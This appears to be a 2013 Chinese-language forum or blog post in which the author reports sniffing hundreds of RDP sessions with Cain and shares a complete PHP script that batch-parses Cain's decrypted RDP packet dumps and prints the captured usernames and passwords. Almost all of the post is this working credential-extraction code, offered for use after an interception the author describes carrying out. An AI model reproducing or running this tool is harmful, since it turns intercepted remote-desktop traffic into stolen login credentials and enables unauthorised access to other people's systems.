Cain嗅探到的RDP包批量解析为用户名+密码的php脚本

踩(0)

顶(23)

Wdot | 2013-01-26 22:19

昨天晚上开始嗅探，好家伙好几百个包，网上搜了一下有一款工具叫“Cain RDP Parser”，好家伙，一个一个选，玩死人的。。。索性写了个PHP脚本来批量解析。凑合着用。



<?php
//Author Wdot
//Site:http://wdot.cc
//用法 php CainRdpParser.php /tmp/1.txt  ＃单个文件解析
//用法 php CainRdpParser.php /tmp/RDP/  #批量解析
error_reporting(E_ERROR);
if(is_dir($argv[1]))
{
  foreach (scandir($argv[1]) as $key => $value) {
    if($value!='.' && $value!='..')
    {
      rdpParser($argv[1].$value);
    }
  }
}elseif(is_file($argv[1]))
{
  rdpParser($argv[1]);
}

function rdpParser($filename){
  $crlf = "\r\n";
  if(!file_exists($filename)){
    print "file \"$filename\" not exists...$crlf";
    return;
  }
  $rdpH=fopen($filename,'r');
  print "FILE:".basename($filename).$crlf;
  fseek($rdpH,0);
  while (!feof($rdpH)) {
    $line=trim(fgets($rdpH));
    if(preg_match("/\w+.address:.*?$/",$line,$m))
    {
      print $line.$crlf;
    }
    if(preg_match("/^\[Client decrypted packet\]/",$line,$m))
    {
      $packet='';
      while (!empty($line)) {
        $line=trim(fgets($rdpH));
        $packet.=substr($line,5,48);
      }
      $packets=explode('0000000000',str_replace(' ', '', $packet));
      $i=count($packets)-27;
      $packets=explode('0000',$packets[$i]);
      $times=0;
      foreach ($packets as $key => $value) {
        if(empty($value) || $times>=2)continue;
        print (($times==0)?'username':'password').":\t".pack('H*',$value).$crlf;
        $times++;
        
      }
      break;
    }
  }
  fclose($rdpH);
  print "-------------------------------$crlf";
}
?>